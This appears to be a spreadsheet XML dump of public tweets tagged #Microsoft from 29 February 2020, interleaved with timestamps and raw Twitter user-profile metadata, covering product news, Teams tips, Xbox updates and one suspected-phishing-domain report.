    <t>{'id': 3010817206, 'id_str': '3010817206', 'name': 'TheExtraIncome', 'screen_name': 'TheExtraIncome', 'location': 'Italy', 'description': 'Charts and comments are for entertainment and educational purposes only. For Trading Advice, seek out a professional. #hedgefund #stocks #trading #stockmarket', 'url': 'http://t.co/DQtzXY1HYx', 'entities': {'url': {'urls': [{'url': 'http://t.co/DQtzXY1HYx', 'expanded_url': 'http://www.theextraincome.info', 'display_url': 'theextraincome.info', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 30804, 'friends_count': 1637, 'listed_count': 150, 'created_at': 'Sun Feb 01 19:34:30 +0000 2015', 'favourites_count': 1058, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 29974,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'http://pbs.twimg.com/profile_images/897549803739127809/khD-KvEr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/897549803739127809/khD-KvEr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3010817206/1422873172', 'profile_link_color': '4A913C',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</si>
  <si>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Sat Feb 29 23:53:53 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #SurfaceDuo : Price, Release Date, Specs, and More | Digital Trends https://t.co/MBinVBjJF7</t>
  </si>
  <si>
    <t>{'id': 1114288189181693954, 'id_str': '1114288189181693954', 'name': '112th Signal Battalion (SO) (A)', 'screen_name': '112thA', 'location': 'Fort Bragg, NC', 'description': '112th Signal Battalion (Special Operations) (Airborne) Twitter handle where you will find news , videos and photos highlighting our Soliders and families.', 'url': 'https://t.co/qWajSAlJ80', 'entities': {'url': {'urls': [{'url': 'https://t.co/qWajSAlJ80', 'expanded_url': 'https://www.smore.com/wz9d7', 'display_url': 'smore.com/wz9d7', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 77, 'friends_count': 322, 'listed_count': 0, 'created_at': 'Fri Apr 05 22:06:21 +0000 2019', 'favourites_count': 2056, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 947, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1210549995126034433/EP5MMnGW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210549995126034433/EP5MMnGW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1114288189181693954/1554504449',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</si>
  <si>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23:46:32 +0000 2020</t>
  </si>
  <si>
    <t>As Indian #startups begin to make inroads in the world of SaaS, #Microsoft has taken notice. The American tech giant today launched 100X100X100, a program aimed at business-to-business SaaS startups. Microsoft said Monday that 100X100X100 will bring... https://t.co/K2uToJlLgJ https://t.co/dqBGd3IfLx</t>
  </si>
  <si>
    <t>{'id': 591142447, 'id_str': '591142447', 'name': 'Amy James', 'screen_name': 'AamyJames', 'location': 'USA', 'description': 'Love my parents, hiking, bears and wildlife! animal activist!\nOuch! Relationship hurts!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 391, 'friends_count': 630, 'listed_count': 11, 'created_at': 'Sat May 26 18:24:11 +0000 2012', 'favourites_count': 182, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9100,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'http://pbs.twimg.com/profile_images/1182286022312370176/FPtNZYeM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1182286022312370176/FPtNZYeM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/591142447/1570803243',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</si>
  <si>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23:42:23 +0000 2020</t>
  </si>
  <si>
    <t>Does #Bellfibe offer discounts to #Microsoft users because the Fibe app does not support @Microsoft browsers?</t>
  </si>
  <si>
    <t>{'id': 54053289, 'id_str': '54053289', 'name': 'John Marshall', 'screen_name': 'VisioMVP', 'location': 'Ottawa', 'description': 'The original Visio MVP, Microsoft Office expert and WP7 fanatic.', 'url': 'http://t.co/39TzHb8k0O', 'entities': {'url': {'urls': [{'url': 'http://t.co/39TzHb8k0O', 'expanded_url': 'http://visio.mvps.org', 'display_url': 'visio.mvps.org', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 501, 'friends_count': 482, 'listed_count': 29, 'created_at': 'Mon Jul 06 00:23:59 +0000 2009', 'favourites_count': 320, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6261,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'http://pbs.twimg.com/profile_images/807266098760454145/G2lN2O-q_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/807266098760454145/G2lN2O-q_normal.jpg',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</si>
  <si>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23:39:35 +0000 2020</t>
  </si>
  <si>
    <t>Diversity is being invited to the party. Inclusion is being asked to dance. 
During a BAM Conference session, I taught Chris Weber the Cupid shuffle.
A thread...
@Microsoft @MicrosoftLife #Microsoft #microsoftlife #theBOLDjourney https://t.co/5TdTMECk9I</t>
  </si>
  <si>
    <t>Sat Feb 29 23:39:15 +0000 2020</t>
  </si>
  <si>
    <t>4 Tips for working from home with Microsoft Teams https://t.co/oCaCLjfCQW #Microsoft</t>
  </si>
  <si>
    <t>Sat Feb 29 23:31:45 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Explains How New Xbox Series X Feature Works  https://t.co/jPResXK8XY #Microsoft #Xbox #XboxSeriesX #Gaming</t>
  </si>
  <si>
    <t>Sat Feb 29 23:30:37 +0000 2020</t>
  </si>
  <si>
    <t>Get ready to take down enemies with a vast array of weaponry and see cool graphics in Call of Duty Modern Warfare 3 https://t.co/TNzwpdFp2B #microsoft #xbox #xbox360 #gaming #fps https://t.co/WyRGpsRGut</t>
  </si>
  <si>
    <t>Sat Feb 29 23:24:40 +0000 2020</t>
  </si>
  <si>
    <t>Hiding Windows File Extensions is a Security Risk
By @BleepinComputer https://t.co/NmBoDpRoZV
#CyberSecurity #Microsoft #infosec 
Cc: @archonsec @fogle_shane @digitalcloudgal @DivergentCIO @JBarbosaPR @todddlyle @cybersecboardrm @alcgroup @TmanSpeaks @VivekGhosal @avrohomg https://t.co/xtUMVgosIA</t>
  </si>
  <si>
    <t>{'id': 326229600, 'id_str': '326229600', 'name': 'Fabrizio Bustamante', 'screen_name': 'Fabriziobustama', 'location': '', 'description': 'Vision of the Future! Entrepreneur.\n\n#Futureofwork #Blockchain #Al #Crypto #Marketing #Industry40 #Bigdata #Fintech #Cloud #Innovation #ML #AR #iot #5G', 'url': 'https://t.co/gtBabqCeGS', 'entities': {'url': {'urls': [{'url': 'https://t.co/gtBabqCeGS', 'expanded_url': 'http://Dataprius.com', 'display_url': 'Dataprius.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 19454, 'friends_count': 7858, 'listed_count': 671, 'created_at': 'Wed Jun 29 15:55:36 +0000 2011', 'favourites_count': 120528, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 82949,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'http://pbs.twimg.com/profile_images/1090266389724549126/TYtz96Vb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1090266389724549126/TYtz96Vb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/326229600/1484066866',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</si>
  <si>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23:20:38 +0000 2020</t>
  </si>
  <si>
    <t>4 Tips for working from home with Microsoft Teams
#MicrosoftTeams #Office365 #Microsoft #Teams #Community #MSFT
 https://t.co/Hf0eKp0osF</t>
  </si>
  <si>
    <t>{'id': 129070861, 'id_str': '129070861', 'name': 'Benjamin Davis', 'screen_name': 'benlawdavis', 'location': 'Baltimore, Maryland', 'description': 'I am a husband, father and a tech enthusiast, developer, letâ€™s build something. I â¤ï¸ Microsoft.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 55, 'friends_count': 88, 'listed_count': 12, 'created_at': 'Sat Apr 03 02:58:51 +0000 2010', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1064,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'http://pbs.twimg.com/profile_images/418193315910385664/XQ6DsLA8_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/418193315910385664/XQ6DsLA8_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/129070861/1547787209',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</si>
  <si>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23:16:40 +0000 2020</t>
  </si>
  <si>
    <t>Last week was very interesting, no new picks yet so many #stocks at a great price. I'm definitely going to be watching #Microsoft and many other. #stockstowatch #stockmarkets Follow @SleepyInvestor1 for stock picks.</t>
  </si>
  <si>
    <t>{'id': 1171619704512929793, 'id_str': '1171619704512929793', 'name': 'The Sleepy Investor', 'screen_name': 'SleepyInvestor1', 'location': 'United States', 'description': "When I find a stock I think will preform well I'll let you know. I am not a professional. All my picks are my opinion. #RobinHood #StocksToWatch", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 17, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Wed Sep 11 03:03:37 +0000 2019', 'favourites_count': 26, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1228114045137510400/4xsLqjCZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228114045137510400/4xsLqjCZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1171619704512929793/1581641377',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</si>
  <si>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23:08:39 +0000 2020</t>
  </si>
  <si>
    <t>Finally on a Leap Day. One step at a time. #Microsoft #Azure #Microsoft366 https://t.co/8enQRrK82o</t>
  </si>
  <si>
    <t>{'id': 138046055, 'id_str': '138046055', 'name': 'Mukesh Yarlagadda', 'screen_name': 'mukeshy', 'location': '', 'description': 'I do IT in the cloud.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 64, 'friends_count': 325, 'listed_count': 0, 'created_at': 'Wed Apr 28 13:41:15 +0000 2010', 'favourites_count': 793, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 145,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'http://pbs.twimg.com/profile_images/1046430165411278849/SKEC33Zi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1046430165411278849/SKEC33Zi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/138046055/1537301421',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</si>
  <si>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23:04:49 +0000 2020</t>
  </si>
  <si>
    <t>V figure from one of the games I'm more hype for then any other game super hype cant wait for it. #v  #gamer #gaming #nerd #geek #streamer #streaming #twitch #ps4 #ps4pro #pcgamer #xboxone #microsoft #sony... https://t.co/yhg5WcS1cH</t>
  </si>
  <si>
    <t>Sat Feb 29 23:00:18 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft updated the dashboard of the Xbox One and it has never looked sexier. #Microsoft #XboxOne https://t.co/cRMeTAMjLZ https://t.co/rkr1TdGAU2</t>
  </si>
  <si>
    <t>{'id': 139007672, 'id_str': '139007672', 'name': 'The Lazy Geeks', 'screen_name': 'thelazygeeks', 'location': 'Los Angeles, CA', 'description': "Official Twitter for The Lazy Geeks blog and podcast. Thinking, so you don't have to. Founded by @amiddleagedgeek and @SapienTLG", 'url': 'https://t.co/gVmpjiptgW', 'entities': {'url': {'urls': [{'url': 'https://t.co/gVmpjiptgW', 'expanded_url': 'https://thelazygeeks.home.blog/', 'display_url': 'thelazygeeks.home.blog', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 421, 'friends_count': 230, 'listed_count': 33, 'created_at': 'Sat May 01 08:00:33 +0000 2010', 'favourites_count': 1921, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15940, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F2E609', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1226284558594658305/XqCdMck4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226284558594658305/XqCdMck4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/139007672/1581203998', 'profile_link_color': 'ABB8C2',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</si>
  <si>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Sat Feb 29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</si>
  <si>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https://t.co/hvYI81eCzB</t>
  </si>
  <si>
    <t>Sat Feb 29 22:58:06 +0000 2020</t>
  </si>
  <si>
    <t>Lt. Charles Neill had to sell his home, car, &amp;amp; couldnt put food on the table for his family. Why? After he was shot in the head, he lost 75% of his income. See his story in #TheWoundedBlue on #iTunes #Amazon #GooglePlay &amp;amp; #Microsoft. @WoundedBlue 
Visit:
https://t.co/NWYdC0a6vY https://t.co/noEBxNufji</t>
  </si>
  <si>
    <t>{'id': 1025666521505267713, 'id_str': '1025666521505267713', 'name': 'â€œThe Wounded Blueâ€ Documentary', 'screen_name': 'WoundedBlueDoc', 'location': 'Las Vegas, NV', 'description': '#AwardWinning film chronicling the powerful true stories behind @LtRandySuttonâ€™s @WoundedBlue organization. Produced &amp; Directed by @JasonHarney72', 'url': 'https://t.co/3Y76hmwEeR', 'entities': {'url': {'urls': [{'url': 'https://t.co/3Y76hmwEeR', 'expanded_url': 'http://www.lightningdigitalentertainment.com/the-wounded-blue.html', 'display_url': 'lightningdigitalentertainment.com/the-wounded-blâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2144, 'friends_count': 2090, 'listed_count': 7, 'created_at': 'Sat Aug 04 08:55:29 +0000 2018', 'favourites_count': 2338, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1003, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1082106520681144321/HP-vtPN8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1082106520681144321/HP-vtPN8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1025666521505267713/1565156038',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</si>
  <si>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22:57:09 +0000 2020</t>
  </si>
  <si>
    <t>@OH_mes2 #Samsung #support to #FightVirus  needs to be followed by #Microsoft, #Amazon, #Tesla and others. They can easily afford it.</t>
  </si>
  <si>
    <t>Sat Feb 29 22:46:29 +0000 2020</t>
  </si>
  <si>
    <t>These are all the problems that #Microsoft Teams and Private Channels can solve. https://t.co/2hesXcNK4q #productivity</t>
  </si>
  <si>
    <t>Sat Feb 29 22:39:00 +0000 2020</t>
  </si>
  <si>
    <t>New user tips to navigate Windows 10, the latest upgrade from Microsoft 
https://t.co/sxUuWWxxFL
#windows10 #microsoft</t>
  </si>
  <si>
    <t>{'id': 38654813, 'id_str': '38654813', 'name': 'Leroy Jenkins', 'screen_name': 'softwaregeek', 'location': '', 'description': 'Computer &amp; sci-fi #geek. #blogger My tweets are solely my own &amp; do not reflect that of my employer: present nor future. https://t.co/spC6UuXHyW', 'url': 'https://t.co/Ivse8wVwro', 'entities': {'url': {'urls': [{'url': 'https://t.co/Ivse8wVwro', 'expanded_url': 'https://stwaba.blogspot.com?utm_source=twitter', 'display_url': 'stwaba.blogspot.com/?utm_source=twâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/spC6UuXHyW', 'expanded_url': 'https://stwaba.blogspot.com', 'display_url': 'stwaba.blogspot.com', 'indices': [120, 143]}]}}, 'protected': False, 'followers_count': 2399, 'friends_count': 3249, 'listed_count': 1098, 'created_at': 'Fri May 08 12:19:36 +0000 2009', 'favourites_count': 26455, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 130603, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '080808', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1210404749163581440/_rsh4dT1_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210404749163581440/_rsh4dT1_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/38654813/1578006618', 'profile_link_color': 'DD2E44',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</si>
  <si>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Sat Feb 29 22:28:21 +0000 2020</t>
  </si>
  <si>
    <t>@XboxAmbassadorN @Xbox @XboxSupport Come on @XboxAmbassadorN. Either tell me how to escalate or admit to @satyanadella and me that there is no support for a customer that has been screwed over by #microsoft billing. #fail #preorder  #Xbox #xboxsupport #xboxlive #badcustomerservice</t>
  </si>
  <si>
    <t>Sat Feb 29 22:18:47 +0000 2020</t>
  </si>
  <si>
    <t>MCSA, MCSD, MCSE certifications retire; with continued investment to role-based certifications #Microsoft  #Certification
 https://t.co/HbuEUd3R3l</t>
  </si>
  <si>
    <t>Sat Feb 29 22:16:26 +0000 2020</t>
  </si>
  <si>
    <t>Has your organization made the transition over to #Microsoft #Teams? The Unified Communications platform not only has similar features as its predecessor Skype for Business, but also includes some newer ones that expand on voice and IM capabilities. https://t.co/QuSYrJjV0Y https://t.co/LiYffKvxGS</t>
  </si>
  <si>
    <t>{'id': 18805586, 'id_str': '18805586', 'name': 'TecFac', 'screen_name': 'TecFac', 'location': 'Rockville, MD', 'description': 'Your Skype for Business, ShareFile and Office 365 implementation partners with #TeamWorkAnyWhere.', 'url': 'https://t.co/DvUeerqTYm', 'entities': {'url': {'urls': [{'url': 'https://t.co/DvUeerqTYm', 'expanded_url': 'http://www.tecfac.net', 'display_url': 'tecfac.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1002, 'friends_count': 1933, 'listed_count': 113, 'created_at': 'Fri Jan 09 16:23:56 +0000 2009', 'favourites_count': 331, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1889, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'ABB8C2', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/525020903629783040/czeszEgm_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/525020903629783040/czeszEgm_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18805586/1474915822', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'C0DFEC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 22:09:03 +0000 2020</t>
  </si>
  <si>
    <t>After a great day at the @scottishsummit it's lovely having an evening with my beautiful wife to relax and unwind!! 
#SS2020 #MSDyn365 #TDG #PowerAddicts #Microsoft #Dynamics365 #Office365 #Azure #ScottishSummit #HusbandAndWife #DateNight #Glasgow #DinnerForTwo https://t.co/t31MdYgL4q</t>
  </si>
  <si>
    <t>Sat Feb 29 22:00:49 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 22:00:48 +0000 2020</t>
  </si>
  <si>
    <t>After an unsuccessful search for a translator for an upcoming meeting with a parent Ive just found out that I can split screen the #MicrosoftTranslator app so that we can both see what each other is saying. This is going to support the parent so much. #microsoft https://t.co/vNGNQBMIX2</t>
  </si>
  <si>
    <t>{'id': 1658240550, 'id_str': '1658240550', 'name': 'R.Leighton', 'screen_name': 'R_L8on', 'location': 'Lincolnshire', 'description': 'Head of School at a Greenwood Academy Microsoft Showcase School, Specialist Leader in Education, #MIEE 2019-2020, EYFS Research Project @GAT_EY_Research', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 503, 'friends_count': 662, 'listed_count': 4, 'created_at': 'Fri Aug 09 17:44:01 +0000 2013', 'favourites_count': 1348, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 642,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'http://pbs.twimg.com/profile_images/943429526931103745/J_hsiRx2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/943429526931103745/J_hsiRx2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1658240550/1472903517',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</si>
  <si>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22:00:32 +0000 2020</t>
  </si>
  <si>
    <t>#EdTech #microsoft     73% of teachers report working in classrooms with student reading levels that span four or more grade levels. That's why it's so important to provide a personalized learning experience for each student. #Office365 https://t.co/wqMOEIzyke</t>
  </si>
  <si>
    <t>Sat Feb 29 22:00:31 +0000 2020</t>
  </si>
  <si>
    <t>Bored of Microsoft Word? Here are some Free Alternatives
#wordalternatives #microsoft #writingtools #microsoftword 
https://t.co/Hg67dECiH0 https://t.co/yq1czE25dX</t>
  </si>
  <si>
    <t>{'id': 4827463944, 'id_str': '4827463944', 'name': 'elink.io', 'screen_name': 'elink_io', 'location': 'San Francisco, CA', 'description': 'elink provides you with endless opportunities to create amazing fast content at scale for your websites, newsletters and social sharing.', 'url': 'https://t.co/6el3Ri3o5k', 'entities': {'url': {'urls': [{'url': 'https://t.co/6el3Ri3o5k', 'expanded_url': 'http://elink.io', 'display_url': 'elink.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 14321, 'friends_count': 15411, 'listed_count': 367, 'created_at': 'Thu Jan 28 23:00:21 +0000 2016', 'favourites_count': 5010, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 15447,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'http://pbs.twimg.com/profile_images/1126187806395527169/TaodDcDp_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1126187806395527169/TaodDcDp_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4827463944/1565611571',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</si>
  <si>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21:53:37 +0000 2020</t>
  </si>
  <si>
    <t>Many thanks to @TNLComFund for supporting our @CCACICUK #Computing skills training course. Today's course focused on #Microsoft #Excel using spreadsheet to do budgeting. Users have found it useful. Next lesson on 07.03.20 12:45-13:45 @ Haggerston School. Enquiries: 07949431548 https://t.co/kOObGam7ap</t>
  </si>
  <si>
    <t>{'id': 1161884369067401216, 'id_str': '1161884369067401216', 'name': 'Community Cohesion Advocates CIC', 'screen_name': 'CCACICUK', 'location': 'Crawley Road, London N22 6AN', 'description': 'Community Cohesion Advocates Community Interest Company (CCACIC) is a not-for-profit organisation that brings people together through youth and elderly projects', 'url': 'https://t.co/98cy6LGYGg', 'entities': {'url': {'urls': [{'url': 'https://t.co/98cy6LGYGg', 'expanded_url': 'https://ccadvocates.org.uk', 'display_url': 'ccadvocates.org.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 8, 'listed_count': 0, 'created_at': 'Thu Aug 15 06:16:35 +0000 2019', 'favourites_count': 34, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1161969165441413121/XuHytgWw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161969165441413121/XuHytgWw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1161884369067401216/1565851051',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</si>
  <si>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21:51:05 +0000 2020</t>
  </si>
  <si>
    <t>How to Account for Multiple Companies in One Database - Gravity Software https://t.co/bNfB4f1tEn by @GoGravityOnline
#QBO #QuickBooksOnline #QBD #QuickBooksDesktop #ProAdvisor #Cloud #ERP #Accountants #CFO #SmallBiz #FamilyOffice #CPA #Cloud #Accounting #Microsoft #PowerBI https://t.co/GPw87GowyM</t>
  </si>
  <si>
    <t>Sat Feb 29 21:42:57 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 21:40:42 +0000 2020</t>
  </si>
  <si>
    <t>Im on Autopilot ... 
@Microsoft @Azure @msftsecurity #autopilot  #microsoft #msftadvocate #security #cybersecurity #cloud  #azure  #msftsecurity  #infosec
https://t.co/qCe6XZE5qG https://t.co/DhYpD8Qg5G</t>
  </si>
  <si>
    <t>{'id': 2187279649, 'id_str': '2187279649', 'name': 'Michael Cassady', 'screen_name': 'lyncrainmaker', 'location': 'The Woodlands, Texas', 'description': '#Microsoft #Seller, Rabble-Rouser &amp; #Legacy #Pirate: busy stirring up passions of #public. #YouReady #LetsGo #movefast #burnitdown https://t.co/SyuTDBmOpy', 'url': None, 'entities': {'description': {'urls': [{'url': 'https://t.co/SyuTDBmOpy', 'expanded_url': 'https://youtu.be/BwFek4V5aP4', 'display_url': 'youtu.be/BwFek4V5aP4', 'indices': [131, 154]}]}}, 'protected': False, 'followers_count': 3562, 'friends_count': 4643, 'listed_count': 180, 'created_at': 'Sun Nov 10 22:34:35 +0000 2013', 'favourites_count': 7149, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8398,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'http://pbs.twimg.com/profile_images/1117130184942149633/imHpMPPS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1117130184942149633/imHpMPPS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2187279649/1579454718',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</si>
  <si>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21:32:57 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> Suspected #phishing domain
 https://microsoft.thelemonplum.com
 AS46606 [192.185.21.108]
 Let's Encrypt Authority X3
Tags: #microsoft #opendir
https://t.co/qL42twUxTr</t>
  </si>
  <si>
    <t>Sat Feb 29 21:32:33 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #remotework     37% of the global workforce is mobile. Save time with mobile communication tools that take the hassle out of teamwork. This infographic shows the benefits from #Teamworksolutions from #Microsoft. https://t.co/fCTz2lSMoG</t>
  </si>
  <si>
    <t>Sat Feb 29 21:31:39 +0000 2020</t>
  </si>
  <si>
    <t>How to Disable #Cortana in #Windows10 via @howtogeek - https://t.co/RGmynQwDcB #DisableCortana #Microsoft #VoiceActivatedAssistant #OS #OperatingSystem</t>
  </si>
  <si>
    <t>{'id': 122783146, 'id_str': '122783146', 'name': 'Kevin', 'screen_name': 'FlightDreamz', 'location': 'Long Island, NY', 'description': 'Watched TopGun more times than any straight man should. "You\'re not happy unless you\'re going MACH 2 with your hair on fire" Plane nut, foodie, C-64 retrogamer', 'url': 'https://t.co/azNTIsAV6t', 'entities': {'url': {'urls': [{'url': 'https://t.co/azNTIsAV6t', 'expanded_url': 'https://www.stumbleupon.com/stumbler/FlightDreamz', 'display_url': 'stumbleupon.com/stumbler/Flighâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 154, 'friends_count': 571, 'listed_count': 5, 'created_at': 'Sat Mar 13 22:15:36 +0000 2010', 'favourites_count': 13514, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9340,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'http://pbs.twimg.com/profile_images/1210269252646834176/zCR3chC6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210269252646834176/zCR3chC6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/122783146/1577385651',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</si>
  <si>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21:26:29 +0000 2020</t>
  </si>
  <si>
    <t>How to fix weird wifi upload issues with #Microsoft #SurfaceBook and #Fritzbox after Windos10 updates. https://t.co/TNAS5nSjs7</t>
  </si>
  <si>
    <t>{'id': 220736090, 'id_str': '220736090', 'name': 'marco gioanola', 'screen_name': 'ilgioa', 'location': 'Italy', 'description': 'DDoS mitigation @arbornetworks, music lover, professional know-it-all. Just personal opinions here.', 'url': 'http://t.co/a0vZUiaAdn', 'entities': {'url': {'urls': [{'url': 'http://t.co/a0vZUiaAdn', 'expanded_url': 'http://www.elbebecius.info/search/label/security', 'display_url': 'elbebecius.info/search/label/sâ€¦', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 305, 'friends_count': 888, 'listed_count': 25, 'created_at': 'Sun Nov 28 17:54:09 +0000 2010', 'favourites_count': 263, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8007,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'http://pbs.twimg.com/profile_images/677497329436487684/CQUCjh1l_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/677497329436487684/CQUCjh1l_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/220736090/1467146915',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</si>
  <si>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21:26:12 +0000 2020</t>
  </si>
  <si>
    <t>Understanding and increasing digital readiness https://t.co/lxYdmFIVoy
For more info: https://t.co/j1GjUsgXhi #data #security #bigdata #Digitaltransformation #finance #cloud #cybersecurity #CEO #cmo #digital #marketing #microsoft #IOT #internetofthings #dell #cto #busines</t>
  </si>
  <si>
    <t>Sat Feb 29 21:26:07 +0000 2020</t>
  </si>
  <si>
    <t>#GDC #2020 #indefinitely #postponed after #losing #Microsoft, #Sony, #Epic to... https://t.co/lgNAkTr9Ts</t>
  </si>
  <si>
    <t>Sat Feb 29 21:22:34 +0000 2020</t>
  </si>
  <si>
    <t>any #microsoft #exchange peoples seen this before?  #halp https://t.co/xrS12jexj6</t>
  </si>
  <si>
